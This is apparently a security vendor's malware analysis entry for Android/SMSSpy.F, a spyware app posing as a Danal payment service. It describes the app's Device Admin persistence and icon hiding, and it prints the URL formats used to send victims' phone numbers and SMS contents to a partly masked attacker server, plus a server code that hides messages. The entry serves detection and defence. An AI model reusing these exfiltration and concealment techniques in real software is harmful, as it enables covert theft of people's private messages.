Android/SMSSpy.F!tr.spy
Analysis
Android/SMSSpy.F!tr.spy is a piece of malware targetting Android mobile phones.
The malicious package comes disguised as a mobile payment service application by Danal Corp. However, in the background, it spies on incoming SMS messages on the victim's phone and forwards them to the attacker's server.
Technical Details
The main application is called "Danal" (ref Fig1) and comes in the package "korean.alyac.view"
Fig1 : The application icon
When launched for the first time, the application asks for Device Administrator permissions from the user (ref Fig2)
Fig1 : Device Administrator Rights request
If the user clicks on 'Activate', the application cannot be uninstalled unless the Device Admin privileges are deactivated.
If the user clicks on 'Cancel', nothing happens
In both cases, the application then returns to the main menu, that no longer contains the application icon.
However, in the background, the following malicious functions are performed:
- When started, it registers the victim's phone with the attacker's server by sending a request to
"http://XXX.XXX.XX.140/" + "?phone=" + [PHONE_NUMBER] + "&type=join"
- Next, whenever an SMS message is received at the victim's phone, it is forwarded to
"http://XXX.XXX.XX.140/" + "?phone=" + [PHONE_NUMBER] + "&send=" + [SMS_SENDER_NUMBER] + "&surak=" + [PHONE_NUMBER] + "&memo=" + [MESSAGE_BODY_ENCODED in UTF-8] + "&type=memo&xcode=1"
- Right after, another request is sent to
"http://XXX.XXX.XX.140/" + "check.php?phone=" + [PHONE_NUMBER]
- If the response sent by the server to this request is "219083", the SMS is hidden from the victim
Permissions required by the application:
- RECEIVE_SMS
- INTERNET
- ACCESS_NETWORK_STATE
- SEND_SMS
- RECEIVE_BOOT_COMPLETED
- READ_PHONE_STATE
- INTERNET
- SEND_SMS
- ACCESS_FINE_LOCATION
- ACCESS_COARSE_LOCATION
- ACCESS_MOCK_LOCATION
- WRITE_EXTERNAL_STORAGE
- VIBRATE
- FLASHLIGHT
- READ_PHONE_STATE
- ACCESS_NETWORK_STATE
- MOUNT_UNMOUNT_FILESYSTEMS
- CAMERA
- WAKE_LOCK
- RECORD_AUDIO
Recommended Action
- FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extended | |
FortiClient | |
Extreme | |
FortiAPS | |
FortiAPU | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |